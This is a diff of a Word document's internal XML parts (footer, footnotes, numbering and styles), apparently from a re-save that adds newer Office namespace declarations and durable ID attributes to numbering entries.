xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:sdt>
     <w:sdtPr>
       <w:id w:val="801883052"/>
@@ -2285,7 +2283,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2310,7 +2308,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="067A3338"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -2826,26 +2824,26 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="275798481">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="2" w16cid:durableId="523979348">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="3" w16cid:durableId="861241133">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="4" w16cid:durableId="210385308">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="5" w16cid:durableId="1905943095">
     <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>

</xml_diff>